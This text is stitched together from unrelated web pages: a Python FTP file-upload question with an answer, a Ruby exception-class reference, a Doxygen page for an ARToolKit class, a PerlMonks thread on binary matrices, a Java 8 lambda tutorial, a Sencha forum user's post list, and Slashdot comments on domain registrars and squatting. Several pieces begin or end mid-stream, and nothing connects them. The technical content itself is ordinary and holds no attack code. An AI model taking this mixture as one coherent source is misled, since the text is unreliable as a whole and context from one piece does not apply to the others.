A great example is back in the day when eBay was young and some domain squatters decided to buy up domains they thought might be worthwhile and try to sell them. So the funniest one I came across was a guy who had registered generalmills.cc and wanted to sell it for $10,000,000. That's right, ten million dollars. His sales pitch was you could buy it and then "Make them pay whatever you liked for the rights." Of course General Mills happily owned generalmills.com at the time and didn't seem to have an interest in others. What's more, a company can nab a domain name that is their trademark if they wish (these days through ICANN, back then through the courts). I e-mailed him calling him an idiot more or less and got one of the most caustic, hate filled responses defending his business claiming he made millions "regularly" on sales. I pointed out to him that he had no sales on eBay thus far, and got more hate in response.
It was quite clear that he thought he'd got a brilliant scam, which was successful only in his own mind. He was just waiting for his big payday... which of course never came.
Re: (Score:2)
Wow, lol. This wasn't a month ago, and it was squatted. Purchased, and thanks!
Re: (Score:2)
Yes, but most often that's in use, which is a different thing.
Re: (Score:2)
By burned down buildings..
Re: (Score:2)
Sheep? I take it you don't utilize any thermostats in the heating of your house? Shun automatic transmission?
For that matter, why not remember and write in IP in the browser bar?
Re: (Score:2)
For that matter, why not remember and write in IP in the browser bar?
Flashbacks to SUN terminal rooms in college; having a notebook half-filled with IP addresses, passed from person to person, because only the CS grad students got printer time...good times.
Re: (Score:2)
To get to slashdot.org (I don't use facebook), I hit Ctrl+T, then the letter s, then the right arrow key, then enter. Once you've been to a site once, you barely need to think at all these days.
Re: (Score:2)
1) Send neural impulses to direct your right arm such that said arm is above the keyboard. You may, if you wish, separate your eyelids so that you might see when you are successful in this.
2) Send more neural impulses to move your thumb right over the key the light reflecting off of which forms the letters Ctrl upside down on your retina. Similarly move your pinky finger right over the key that looks like a T. Note that although pressing the key normally places a lowercase t on the screen, the key is still
Re: (Score:2)
> browser does a swift “I'm feeling lucky” search
Umm... Maybe this changed, but the last time I checked, Firefox tries .com and a few other toplevels until one resolves.
Re: (Score:3, Informative)
Actually, the reason Google knows that bit more about sites people visit, is that Firefox, Chrome and Safari all send each and every domain you visit to Google's Safebrowsing servers before they connect to it.
That is not how SafeBrowsing works. Firefox downloads a large database of hash prefixes. If the hashes of the domain and url are not in the list you go to the site and nothing is sent to Google. If the first bit of the hash matches an entry in the list Firefox asks Google for the list of complete hashes that start with that prefix. If the site's hash matches then you're blocked, if it doesn't you're not, but nothing more is sent.
To further obfuscate things, when Firefox finds a prefix match it doesn't just
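To make the prefix-matching idea concrete, here is a rough sketch in Java (hypothetical URLs and a 4-byte SHA-256 prefix; this illustrates the general flow only, not the real SafeBrowsing wire format or API):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class PrefixCheckSketch {
    // First 4 bytes of the URL's SHA-256 digest, hex-encoded
    static String prefix(String url) throws Exception {
        byte[] hash = MessageDigest.getInstance("SHA-256")
                .digest(url.getBytes(StandardCharsets.UTF_8));
        StringBuilder sb = new StringBuilder();
        for (byte b : Arrays.copyOf(hash, 4)) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        // Locally stored prefix list (hypothetical entries)
        Set<String> localPrefixes = new HashSet<>();
        localPrefixes.add(prefix("http://evil.example/"));

        String visiting = "http://good.example/";
        if (localPrefixes.contains(prefix(visiting))) {
            System.out.println("prefix hit: ask server for full hashes");
        } else {
            System.out.println("no match: visit directly, nothing sent");
        }
    }
}
```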
Re: (Score:2, Redundant)
So the only reason that you are against it is so you do not need to pay more for another domain name. And yet by registering three domain names (com, net, org) you and almost everybody else are using up those names.
I always thought these com, net, org and all others are not a good idea. The best would have been to just use the ones for each country. That would have made this site slashdot.us. "But what about international organizations like debian?" I hear you ask. Well, either take the one where the organ
Re: (Score:2)
Here is proof, in the form of a registry desperately trying and failing to get people to buy
Re: (Score:2)
Re: (Score:3, Interesting)
It's the manner in which the girls are selling domains.
I don't mind girls in commercials. Even sexy girls in commercials, if it's appropriate for the product. For example, beer, which is traditionally a "macho" drink, or Axe bodywash, or Victoria's Secret (who, contrary to common sense, are targeting their ads mainly at men that buy those sexy clothes for their girlfriends/wives).
GoDaddy's commercials pretty much tell me that they're positioning their services as a "macho" service, and it simply doesn't m
Re:It's not mined out. (Score:5, Informative)
Get rid of domain tasting
It's pretty much gone: [wikipedia.org]
"ICANN reported in August 2009, that prior to implementing excess domain deletion charges, the peak month for domain tastings was over 15 million domain names. After the $0.20 fee was implemented, this dropped to around 2 million domain names per month. As a result of the further increase in charges for excess domain deletions, implemented starting April 2009, the number of domain tastings dropped to below 60 thousand per month."
I know from personal experience that a domain I had let lapse and was sat on for years became available again after the ICANN policy was put in place.
Re: (Score:2)
Yes, it's frustrating. I am trying to come up with a .com name and most of the names are squatted (registered but no website, or a godaddy.com placeholder website).
Re: (Score:3, Informative)
Yes, it's frustrating. I am trying to come up with a .com name and most of the names are squatted (registered but no website, or a godaddy.com placeholder website).
The web is not the internet. There are many more things to use a domain for than just a website.
Re: (Score:2)
You're a good couple years behind. "Tasting" is long-dead. [icann.org]
So now would you like to try again to regale us with your extensive insight into the domain name system, and the answers to all our problems?
.co for company ? (Score:4, Insightful)
.co.uk, .co.jp and .co.nz are already in use as a company designator, so why not? But what about the collision with the Colombian country domain?
Re:.co for company ? (Score:5, Funny)
...and .co.ck (Cook Islands, really, look it up!)
Re: (Score:2)
.co.uk, .co.jp and .co.nz are already in use as a company designator so why not ? but what about the collision with the Colombia state domain ?
You don't like .co.co?
.co for phishing (Score:2)
It's pretty easy to pick out the "yourbank.leethaxors.com" and "batt13.net.com" spam. But with an appropriately formatted email, a link to "slashdot.co" might actually get some folks to click the link and log in to the phishing site.
-Rick
Re: (Score:3, Funny)
In return, let Canadians use the ccTLD for Western Sahara [wikipedia.org].
Re:The right question (Score:4, Interesting)
The question we should ask ourselves is whether or not we should accept domain name registration as a commercial practice.
How about a resounding yes? The vast majority of sites on the internet are used for businesses. ".com" is short for "commercial," you know. If you want to talk about taking ".org" domains out of the commercial registration pool, there are practices that might be put in place to restrict their use in a way that ".edu" and ".gov" are used. I think you would be a little late to the party, though.
Re: (Score:2)
Just so we are clear on that, I'm not suggesting anything. I honestly do not know the right answer to this complex question myself.
But I want to put emphasis on the point that I'm talking about the registration process of a domain name, not the actual websites behind these names. I'm referring to the fact that registrars are commercial websites themselves, employing commercial tactics I would expect from any other commercial website or store.
Re: (Score:2)
Re: (Score:3, Interesting)
Real estate is an extremely good model for how the DNS system should be run.
In places with significant unused land (for our purposes preserves and protected wilderness would be considered used) it is often possible to obtain ownership of such land by simply claiming it, and using it. (Law varies by nation, but this still occurs, and was far more common in the past).
In all other cases you buy land from an existing holder.
Regardless of one one obtains the land though, one must still pay any property tax, or
Godaddy mistake? (Score:2, Interesting)
Re: (Score:3, Interesting)
I use Godaddy almost exclusively for my many (too many) domains... that said, let's be honest.
It's not a mistake. Their checkout process is designed to wave as many unnecessary - yet seemingly useful - options as possible in front of novice domain customers, in hopes that one or two will fall into their basket by mistake. No doubt their logs are full of new customers landing and searching for an unavailable .com domain, repeat, repeat, repeat, give up.
Now by defaulting to .co and hiding .com they can sell
Re:Godaddy mistake? (Score:5, Interesting)
Yes, no mistake. They were pushing this even before it became available for sale: [godaddy.com]
'Pre-registration is now open for the newest truly global and recognizable domain name extension to come along in years: .co -- It's used everywhere as an abbreviation for Company, Corporation, and Commerce. Let it vault your company into the global Internet marketplace!
Here's your chance to grab domain names that have been taken for years with the .com extension. Pre-registration includes application periods for trademark holders and others.'
garbage domains (Score:2, Insightful)
Re: (Score:2)
.co is a country TLD. It's just misused, in largely the same way as .me, .nu, and many others.
Re: (Score:2)
So is .tv, Tuvalu.
Of course the entire top level domain thing is largely broken from today's point of view, because it's so US-centric. Non-country domains should be global. Country domains should be somehow related to that country.
What I mean is, if you go to porn.<country tld>, you should get a porn site from that country, or at least content with "performers" who are mostly from that country, and advertising meant for that country, even for foreign web clients, because presumably they're planning a vacation or something?
Since I live in the US, not only am I OK with it, I see it as a significant benefit!
Re: (Score:2)
Because many people who grab these domains don't understand what "their rules" are, or even that they are dealing with the rules of another country. They just think the TLD sounds cool. And the registrar (who doesn't want to lose a sale) doesn't do anything to explain it to them. Which leads to situations like this [arstechnica.com].
Re: (Score:2)
Which leads to situations like this [arstechnica.com].
Or this [theregister.co.uk]
Re: (Score:2)
country code tld's are supposed to represent sites in or at least related to that country. Misuse would be using them for sites that have nothing to do with that country.
Misusing cctlds, particularly of unstable countries or ones ruled by a very different ideology to your own, is a dangerous game. If the country decides they don't like your type of site, or they don't like misuse in general, there is little you can do about it. As someone has already pointed out, registrars do nothing to explain this to their c
Let's call it scam when it is a scam (Score:3, Insightful)
Re: (Score:3, Interesting)
agreed. just another way for godaddy to profit from the clueless or too-lazy-to-read-what-they're-doing... which is a pretty large percentage of their customer base.
Regular business = scam (Score:2)
Re:Let's call it scam when it is a scam (Score:4, Interesting)
It's a scam to sell off .co domains as .com domains, and it should be outed as such by slashdot.
I smell lawsuit. Unwary and dumb users expect to have their hands held in this day and age.
This is a really uninformed error by the world's largest registrar. If you don't have a big blue banner that says "This is NOT a .COM domain - .CO domains are from COlumbia!" you are automatically setting yourself up for a class-action suit which you will assuredly lose or settle.
But maybe the GoDaddy lawyers already figured out the cost of the suit, the settlement and the legal fees, and the 90% markup still leaves more on the table than an ultra-competitive .com price. In which case, we are the sheeple and will be eaten soon by the GoDragon.
Fuck the ccTLDs anyway... (Score:2)
I saw the stupid Twitter-140-character-limit-moronity-mandated URL-shortened [flic.kr] the other day, and I thought, the concept of ccTLDs is dead! Why not just use [flickr] if you're going to do that.
Yeah, the Internet is getting stupider and stupider every second...
Re: (Score:2)
Damn ACs, making all Americans look stupid and unworldly
;(
Vote with yr wallet. (Score:3, Insightful)
Re: (Score:2)
When a monopoly provides a service you desperately need, it's hard to stop them from milking you for all you're worth.
You have to maintain an internet presence these days, and failure to "keep with the times" may well jeopardize your ability to do business, hold down a job, and so on.
So you pay the piper.
Re: (Score:2, Insightful)
Re: (Score:2)
Considering how they and their competitors pull the same crap, I'd call it a de-facto cartel.
Public needs to learn not everything is dot com (Score:2)
Re: (Score:2, Informative)
"Domaining" may be on the way out. (Score:3, Interesting)
With the October 27th change to Google web search, "domaining" may be on the way out.
Google made huge changes when they merged "Google Places" (which is really Google business search) results into their main web search results. Search for DVD player [google.com]. There are almost no "organic search results" shown. At the top, there's "Related searches for dvd player - Brands, Stores, Types". There are two "organic" results from Amazon and Best Buy, both Google advertisers. Then a big block of "shopping results", and a right-side column of ads.
And that's a non-local search. On searches which imply some location ("london hotels" is a good test case), Google displays a map. For a few days, they displayed a big map in the main search area; today it's on the right, above the ads. Between the big ad block at the top, the map at the right, the ads below the map, and the links in the main search area to the map, only a few organic results are squeezed in.
Google's organic search isn't any better than it used to be at filtering out the bottom-feeders. Down below the fold on "dvd player" search, there's still a result from "bestsoftware4download" (which tries a drive-by install of some .exe). In the "london hotels" search, there are a few junk entries. Most of the stuff visible on the first screen isn't organic search results, though. This makes "domaining" futile.
Google is still fooling around with their layout after their big change, and it hasn't settled yet. (Also, Google's layout changes if you're logged into Google and allow "personalization". The results mentioned above are not "personalized".) The trend, though, is clear. The primary results for a search with commercial intent now come from Google advertisers. Google is pushing advertisers to buy ads directly from Google, not from the "bottom feeders".
So buying up large numbers of ".co" domains may be futile. I expect we'll see many junk domains in ".com" expiring, with nobody picking them up.
Not dissimilar to CentralNic's "country" .com/.co (Score:2)
15 years ago, CentralNic pulled a similar stunt with the .com domains - they went around and registered domains like uk.com, us.com, cn.com and ru.com and then brazenly sold subdomains off of those as if they were "top-level domains", complete with hefty charges (32.50 GBP per year for something.uk.com for example).
It ties in with this story too, because CentralNic have indeed registered uk.co and us.co as well, so I wonder when they'll try to "persuade" the public that something.uk.co is a legit top-leve
Re: (Score:2)
Go to flat namespace (Score:2)
Why do we even have root domains? Why not simply partition load by say the last few letters of the domain name. Reserve trademarks, proper names, and other forms of identity to their rightful owners - this way say a city can register a "root" domain and sell subdomains. Or a country. Or a DNS hotel like GoDaddy. Small organizations can register with whoever they wish as a subdomain, or run their own top level if they wish. Charge a flat fee per domain to recover load costs.
And get rid of the annoying
Re: (Score:2)
Um, you don't know much about Colombia then. They have made significant advances in fighting the drug cartels. Maybe you are thinking about Mexico?
Re: (Score:2)
Why yes, yes I am.
Thank you in advance; also, any pointers on making the program better will be well appreciated. All that is required though, is that the numbers entered are greater than zero and actually numbers.
#include <iostream>
#include <string>
using namespace std;

int numEmployees();
int daysMissed(int);
double averageMiss(int, int);

int main()
{
    int employees;
    int sum;
    double average;
    cout << "This program calculates the average number of days missed by employees.\n";
    employees = numEmployees();
    sum = daysMissed(employees);
    average = averageMiss(sum, employees);
    cout << "Average number of days missed equals " << average << "\n";
    return 0;
}

int numEmployees()
{
    string invalid;
    int num;
    cout << "How many employees do you have?\n";
    cin >> num;
    while (!(cin >> num) || num < 1)
    {
        cin >> invalid;
        cout << "You typed \"" << invalid << "\" instead of a positive integer." << "\n";
        cout << "Please try again." << "\n";
    }
    return num;
}

int daysMissed(int employees)
{
    int count = 0;
    int sum = 0;
    int num;
    while (count != employees)
    {
        cout << "How many days did employee " << count + 1 << " miss?";
        cin >> num;
        if ((cin >> num) && num > 0)
        {
            count++;
            sum = sum + num;
        }
        else
        {
            cout << "Invalid input!\n";
        }
    }
    return sum;
}

double averageMiss(int sum, int employees)
{
    double average = static_cast<double>(sum) / static_cast<double>(employees);
    return average;
}
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Nov 30, 2006, at 9:40 AM, Talin wrote:

> Greg Ewing wrote:
>> Barry Warsaw wrote:
>>> I'm not sure I like ~/.local though - -- it seems counter to the
>>> app-specific dot-file approach old schoolers like me are used to.
>> Problems with that are starting to show, though.
>> There's a particular Unix account that I've had for
>> quite a number of years, accumulating much stuff.
>> Nowadays when I do ls -a ~, I get a directory
>> listing several screens long...
>> The whole concept of "hidden" files seems ill-
>> considered to me, anyway. It's too easy to forget
>> that they're there. Putting infrequently-referenced
>> stuff in a non-hidden location such as ~/local
>> seems just as good and less magical to me.
>
> On OS X, you of course have ~/Library. I suppose the Linux
> equivalent would be something like ~/lib.

I forgot to add in my previous follow up why I'd prefer ~/.local over ~/local. It's a namespace thing. Dot-files in my home directory are like __names__ in Python -- they don't belong to me. Non-dot-names are my namespace, so things like ~/local constrain what I can call my own files. When I switched to OS X for most of my desktops, I had several collisions in this namespace. I keep all my homedir files under subversion and could not check out my environment on my new Mac until I renamed a few directories (this was exacerbated by the case-insensitive file system).

I think in general OS X has less philosophical problem with colliding in the non-dot namespace because most OS X users don't ever /see/ their home directory. They see ~/Desktop. Maybe that's what all the kids are into these days, but I still think dot-names are better to use for a wider acceptance.

- -Barry
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iQCVAwUBRW72vXEjvBPtnXfVAQJUmAP8DOQkDJm35xfpSPmvFPXYNZYRhYk8gdSk
yMisPq100d5c0lGvW/LjDyLoyi96vd0IQu/WfSgzbe9MBvJ6egP2R0U9hgwytxo5
VcI7jiqel8KFRqgM+4Xqau7MGRiIBGsNX/V5tzGPBA5QP4eSSEFXh/2i9l7ciWJE
bN/byz5zlXo=
=8CkG
-----END PGP SIGNATURE-----
Migrating an Existing Extension to JDeveloper 11gR2 -- Part Two
By John 'JB' Brock on Jun 15, 2011
We covered the basics of how to migrate an extension that does not use the Addin.initialize() method, in Part One of this topic. If you haven't taken a look at that yet, I strongly recommend that you do.
Quick review
With the release of JDeveloper 11g R2, the extension framework is now based on OSGi. Because of this, we no longer load all of the extensions at the same time, at the startup of the IDE. We now use something called Lazy Loading which only loads extensions when they are needed. Because Addin.initialize() is no longer called at IDE startup, you have to think a little more carefully about of how your extension integrates into the IDE. You can't just dump everything out there and have it ready to go.
I'm going to use the Extension SDK sample project, "OpenNodes" for this migration example.
A different point of view
The first thing we need to think about, is what user interface element can be used to trigger the loading of the rest of the extension. When we open the OpenNodesAddin class, which extends Addin, we see that there are two different things going on in the initialize() method.
A new factory object is being created, and a call is made to a method named installViewMenu, which does exactly that: it installs a menu item into the View menu.
If we move the functionality of this method to be done declaratively in the extension.xml file's trigger-hooks section, we will be able to show the menu item in the View menu, without actually loading any of the other code in the extension. It will not get completely initialized until the menu item is selected. Go ahead and comment out the call to the installViewMenu() method and save the file.
The existing extension.xml file also contains an action element which will need to be migrated. You can refer back to Part One for information on how to modify the action element and add the now required controller element as well.
We'll focus on the installViewMenu() method and how we will migrate it's functionality over to a menu element in the extension.xml file. Here is what the existing method looks like
This is a pretty simple method that adds a menu item to the View menu on the IDE main menubar. It calls the only action that we have in the extension.xml file already. It doesn't have anything in the method that defines where the menu item is supposed to be placed within the View menu itself. We can just do the same thing and let the IDE place the menu item in the default location if we like.
Let's move over to the extension.xml file now and add our menu element to the triggers section of the file. For this example, I have already gone ahead and done the migration of the action element, as well as the changes to the required-bundles element.
I'm going to go ahead and add the <menu-hook> element to the bottom of the <triggers> element, right after the new <controllers> element that we added.
The <menu-hook> element has one required argument of "xmlns". We'll set this to ""
Once you have the menu-hook element started, you can use the xml schema tool in the Structure window, just as we described in Part One of this topic. We will need to add the following elements to finish the menu-hook section.
If you are not sure what values to use for the <menubar> id and <menu> id, you can refer back to a blog post I did early in 2011 about how to work with declarative menus in jdeveloper extensions.
The new trigger-hooks section is going to look like this when it's done.
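The listing itself was an image and did not survive extraction, so here is a rough sketch of the shape such a section takes. The element names follow the 11gR2 trigger-hooks schema, but the namespace URIs, the action id, the controller class, and the section id shown here are assumptions for illustration, not necessarily the sample's actual values:

```xml
<trigger-hooks xmlns="http://xmlns.oracle.com/ide/extension">
  <triggers>
    <actions xmlns="http://xmlns.oracle.com/jdeveloper/1013/extension">
      <!-- action id and label are assumed -->
      <action id="opennodes.show">
        <properties>
          <property name="Name">Open Nodes</property>
        </properties>
      </action>
    </actions>
    <controllers xmlns="http://xmlns.oracle.com/ide/extension">
      <!-- controller class name is assumed -->
      <controller class="opennodes.OpenNodesController">
        <update-rules>
          <update-rule rule="always-enabled">
            <action id="opennodes.show"/>
          </update-rule>
        </update-rules>
      </controller>
    </controllers>
    <menu-hook xmlns="http://jdeveloper.oracle.com/1013/jdeveloper-xml/menus">
      <menus>
        <menubar id="javax.ide.view.MAIN_WINDOW_MENUBAR_ID">
          <menu id="javax.ide.VIEW_MENU_ID">
            <section id="opennodes.section" weight="1.0">
              <item action-ref="opennodes.show"/>
            </section>
          </menu>
        </menubar>
      </menus>
    </menu-hook>
  </triggers>
</trigger-hooks>
```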
We should be able to test the new version of the extension now, by doing the steps of:
-- Build
-- Deploy to target platform
-- Run Extension
The "Deploy to Target Platform" step is required in 11gR2 before you try the "Run Extension" feature. This builds the OSGi bundle so that it can be deployed properly.
Cleaning things up
Once you run the new version, you should come across two things.
1) There is a warning telling you that "registerDockableFactory" has been deprecated, after you do the compile (I'm doing a rebuild when I see this)
2) When you actually run the extension, a Warning will be thrown telling you that the <feature> hook doesn't have a corresponding <feature-member>.
While everything will run fine with these warnings in place, lets go ahead and clean things up.
To get rid of the runtime warning, let's add a <feature-member> element just before we start the <trigger-hooks> section.
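The corresponding snippet did not survive extraction; a minimal sketch (the member name and namespace here are assumptions, so check the feature-hook schema for the exact attributes) would be along these lines:

```xml
<!-- placed just before the <trigger-hooks> section; the name is an assumption -->
<feature-member name="opennodes" xmlns="http://xmlns.oracle.com/ide/extension"/>
```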
The registerDockableFactory() method is being replaced with a trigger-hook. You can add this to the triggers element using the schema editor in the Structures window. The class name and id will be required.
The result will look like this.
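As with the other listings, the original image is missing; a sketch of the hook, with the class name being an assumption and the id matching the ID constant kept in the factory class, might read:

```xml
<dockable-hook xmlns="http://xmlns.oracle.com/ide/extension">
  <!-- id should carry the value of the factory's ID constant;
       the class name is an assumption -->
  <dockable-factory id="OpenNodes"
                    class="opennodes.OpenNodesDockableFactory"/>
</dockable-hook>
```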
The last thing to do is go into the OpenNodesDockableFactory class and comment out the method that does the existing registration. Leave the ID variable declaration though. That's needed by other parts of the code.
Now if we rebuild, deploy, and run the extension, everything should work without any warnings or errors.
Conclusion
By moving the GUI elements out of the Addin.initialize() method, we can display the connections that our extension requires for the user to enable the full functionality and start usng the extension. Once the trigger is hit, the IDE will call the Addin.initialize() method and do the rest of the loading of the extension.
There may still be cases where an extension needs to load, but doesn't have a GUI element to use as a trigger. In those cases, there is usually something else that is being added to the IDE by the extension, that can be used as a trigger. Take a look at the Trigger Hooks Wiki for a list of trigger-hooks provided by the IDE, and some more information about each of them.
As usual... Comments, Comments, Comments. Toss out your experiences and questions for others to learn from. All are welcome.
Looking for information on template-hook
Posted by guest on December 15, 2011 at 06:15 AM PST #
In regards to the difference between 11gR1 and 11gR2? Or just info about template-hook in general?
The only difference is that you place the <template-hook> element in the <trigger-hook> section of an R2 extension.xml file and you add the namespace to the opening element.
<template-hook
Otherwise the elements are exactly the same in R1 and R2.
Let me know if this helps or not.
--jb
Posted by John 'JB' Brock on December 15, 2011 at 06:31 AM PST #
I have migrated an extension from R1 to R2. It works fine on my PC. When I install this extension to another PC, I got this error: java.lang.NoClassDefFoundError: oracle/ide/controller/Controller
(I use some classes from oracle.ide.jar which is in path $ORACLE_HOME$/jdeveloper/ide/extensions/ - I have this bundle in the extension.xml file in extension dependencies)
I couldn't find any reason for that. Do you have any suggestion?
Thanks
Posted by Vladimir on April 05, 2012 at 09:14 PM PDT #
This is most likely caused by a required dependency not being added to the MANIFEST.MF file.
Take a look at this blog post to see how to check if the files are being listed properly
If this doesn't work, or doesn't make sense, please contact me directly via email (john<dot>brock<AT>oracle.com) and I'll be happy to help work this out with you.
Posted by guest on April 06, 2012 at 02:51 AM PDT #
Is there a way to load the extension at IDE startup? I noticed that there is a Balloon project in the extension samples that has no trigger-hooks and is loaded at IDE startup. The extensions log says that it was triggered and the reason is "Marked to reload at startup", but I don't understand how it is achieved. I have also seen the same question (unanswered) here:
Posted by Aleksei Sosnovski on February 04, 2013 at 05:13 AM PST #
Hi Aleksei,
No, there is not a trigger-hook to load an extension at Startup. That would defeat the entire purpose of lazy loading of extensions. Once a developer has loaded your extension the first time, it will continue to be loaded at startup if the project that references it, is still open.
The Balloon example is an odd case in that it's actually a child of a larger extension that was already loaded. It makes it look like it's loading at startup, but it's not.
Posted by John 'JB' Brock on February 04, 2013 at 06:41 AM PST #
Thanks for the prompt reply.
If there is no out-of-the-box way to load the extension at startup, I will have to find an alternative.
There are certain features that ideally require the extension to be loaded at startup. Among many other things, it has to register a custom JavaOptionProvider. I see multiple ways to do it:
- Load the extension when (actually before) a Java process is started. It also includes starting Weblogic, at least the integrated one. Since other custom extensions may start Java processes, catching this event might be a problem.
- Load the extension when a project has Java technology. Not the best solution because AFAIK one can start integrated Weblogic without opening any projects, but it should be sufficient.
- Create a custom trigger hook that would load the extension at startup.
Which of the above solutions sounds most reasonable? And how this solution can be implemented? Unfortunately documentation on technology scope hook and custom hooks is insufficient, at least for somebody who has as little experience with JDeveloper as I do.
Posted by guest on February 04, 2013 at 11:26 PM PST #
I am migrating an extension from 11gR1 to 12c(12.1.2). I am not able to make code template work on JDev12.1.2.
In 11.1.1.5 we have the code template file under meta-inf folder and in the extension.xml file we have the following entry under hook
<code-template-hook
<templates-url>/meta-inf/code-templates.xml</templates-url>
</code-template-hook>
For 12c I am doing the same other than adding the code-template-hook under triggers section. But its not working. Is there something more i need to do ?
Posted by Apurba on July 24, 2013 at 08:13 AM PDT #
Hi Apurba, questions like this are probably best asked and answered in the forums instead of in comments of the blog.
I would re-ask this question over at:
While you're moving over there though, I would ask first if the extension loads at all? Placing this tag in the triggers section is not going to actually trigger the extension load. What are you using as a trigger-hook?
Posted by John 'JB' Brock on July 24, 2013 at 08:32 AM PDT #
I have added a Tools menu item via menu bar hook which is used to load and initialize the custom extension I am migrating for 12.1.2. Upon initializing the extension creates a custom workspace and add it to the jdeveloper content pane..
Posted by guest on July 25, 2013 at 07:21 AM PDT # | https://blogs.oracle.com/jdevextensions/entry/migrating_an_existing_extension_to1 | CC-MAIN-2014-15 | en | refinedweb |
Bugtraq mailing list archives
Hello,
On 9 Oct Paul Boehm, whom I respect immensely for his contributions to linux
security audit list, claimed
i found this overrun some months ago and even tried to exploit it...
all i got was a shell with MY uid... then i posted it to the security
auditing mailinglist and Alan Cox pointed out that vga_init() drops
root privileges.. all you can gain from this overrun is video display
access
False. I propose a small test: three questions. The answer for each of them
lies 24 newlines below the question. 3 correct answers equals hash prompt.
I tested my exploit successfully on zgv-3.0-4, which is shipped with
redhat 5.1, overflowing with HOME env variable; I'm pretty sure it will work
with other versions of zgv, probably on other distributions as well ( debian
sources are almost identical to redhat's) .
Q1. Indeed, after the overflow our uid, euid, fsuid and saved uid are non-zero.
But what in fact is <quote>"video display access"</quote>, what resources
are required?
Q2. Pure technical question: How do I find the address of my task_struct ?
Answer 2. If you, carefull reader, are older then 14, you should remember
LDT exploit. Task_struct was pinpointed using pattern matching. This technique
is very powerfull, can be harnessed as well for locating struct module in LKM
which intends to be invisible. Yet there is a better method. We'll reap
the address of struct task_struct * task[] from /proc/ksyms. It's not
exported ? True. However, in kernel/sched.c, line 107, we read
<quote>
struct task_struct * task[NR_TASKS] = {&init_task, };
struct kernel_stat kstat = { 0 };
</quote>
So, the address of task is NR_TASKS*sizeof(task_struct*) less than the
address of kstat, which IS exported. When we have this address, we just need
to check pid of each task struct for equality with our pid.
The code which writes to /dev/mem is enclosed at the end of this post.
Conclusions:
1) Any suid program that uses svgalib must be secured against overflows as
tightly as any other suid binary.
2) A week ago I contacted three major Linux distributions, warning them
about the zgv insecurity. I received two responses, one of them being "We
don't ship zgv with our distro, nothing we can do". The second interlocutor
wasn't too convinced about the severity of the problem; I presented him the
exploit code, then the conversation died. If I had any doubts about
importance of full-disclosure, they're gone now.
3) In order to make this post complete, I should enclose a patch. However zgv
wasn't designed with security in mind,
[zgv-3.0-src]$ grep 'strcpy\|strcat\|sprintf\|scanf' *.c |wc -l
55
auditing it is a rather lengthy task.
The best solution seems to be to remove suid bit off zgv. It is meant
*grin* to be run from the console, and the console access usually means root
access anyway. If you need to allow untrusted users to use it, use
StackGuard-ed version. Or read
( this is an excellent Solar Designer's post on some clever method of
securing to some extent strcpy's and related), add the enclosed header file
to the end of zgv.h and recompile. This will help to defeat overflows only,
but they seem to be the only threat: zgv runs with unpriviledged uid ( so no
races and other fs tricks) , and can't be ptraced ( dumpable flag is set ).
Salute to Abbath&Demonaz, who are immortal.
Save yourself,
Nergal
PS . The code.
In order to make it work, it needs little tuning. Find in your /proc/ksyms the
address of kstat and correct the value in line 32. As you can see, this code
attempts to make /tmp/szel suid root.
BTW, if you don't enter this value properly, this code may well end up
writing stuff to random locations in kernel memory. I don't take any
responsibility for the damage it can cause :(
A note for script kiddies & idiots: you need to compose a prog which
overflows zgv yourself, then change usual /bin/sh to the code below.
------------------------------cut here-----------------------------------------
/* by Nergal */
#define SEEK_SET 0
#define __KERNEL__
#include <linux/sched.h>
#undef __KERNEL__
#define SIZEOF sizeof(struct task_struct)
int mem_fd;
int mypid;
void
testtask (unsigned int mem_offset)
{
struct task_struct some_task;
int uid, pid;
lseek (mem_fd, mem_offset, SEEK_SET);
read (mem_fd, &some_task, SIZEOF);
if (some_task.pid == mypid) /* is it our task_struct ? */
{
some_task.euid = 0;
some_task.fsuid = 0; /* needed for chown */
lseek (mem_fd, mem_offset, SEEK_SET);
write (mem_fd, &some_task, SIZEOF);
/* from now on, there is no law beyond do what thou wilt */
chown ("/tmp/szel", 0, 0);
chmod ("/tmp/szel", 04755);
exit (0);
}
}
#define KSTAT 0x001ca90c
main ()
{
unsigned int i;
struct task_struct *task[NR_TASKS];
unsigned int task_addr = KSTAT - NR_TASKS * 4;
mem_fd = 3; /* presumed to be opened /dev/mem */
mypid = getpid ();
lseek (mem_fd, task_addr, SEEK_SET);
read (mem_fd, task, NR_TASKS * 4);
for (i = 0; i < NR_TASKS; i++)
if (task[i])
testtask ((unsigned int)(task[i]));
}
Utility code for synchronizing exception detection across processors.
#include "Teuchos_ConfigDefs.hpp"
#include "Teuchos_TestForException.hpp"
Utility code for synchronizing exception detection across processors.
Definition in file Teuchos_ErrorPolling.hpp.
TEST_FOR_EXCEPTION(Teuchos::ErrorPolling::pollForFailures(comm), \
    std::runtime_error, \
    "off-processor error detected by proc=" << (comm).getRank());
This macro polls all processors in the given communicator to find out whether an error has been reported by a call to ErrorPolling::reportFailure(comm).
Definition at line 128 of file Teuchos_ErrorPolling.hpp. | http://trilinos.sandia.gov/packages/docs/r10.8/packages/teuchos/doc/html/Teuchos__ErrorPolling_8hpp.html | CC-MAIN-2014-15 | en | refinedweb |
java.lang.Object
  org.apache.openjpa.kernel.OpenJPASavepoint
public class OpenJPASavepoint
Represents a savepoint where operations afterwards can be rolled back and restored to this point
public OpenJPASavepoint(Broker broker, String name, boolean copy)
public Broker getBroker()
public String getName()
public boolean getCopyFieldState()
protected Map<StateManagerImpl,SavepointFieldManager> getStates()
public void save(Collection<StateManagerImpl> states)
OpenJPAStateManagers as necessary.
public void release(boolean user)
user - if true, user initiated, otherwise a side effect of another savepoint's release/rollback
previous - previous savepoints set in the transaction
Practical PHP Refactoring: Extract Interface
A concrete class still defines an implicit interface by itself, as the set of its public methods. When the called interface is a subset of this, or it is depended upon in multiple places, it is interesting to make it explicit.
The Extract Interface refactoring creates an interface from an existing concrete class.
Why?
Interfaces are not strictly necessary for computation: PHP is already Turing-complete without them. Interfaces describe what a collaborator should accomplish, while classes describe how, with all the necessary code. However, apart from documenting a contract between two classes, they have several benefits.
In the realm of TDD, they enable outside-in testing with mocks: this means you can test-drive a class together with the interfaces it depends upon, even if the real implementations of its collaborators do not exist, or do not implement them, yet.
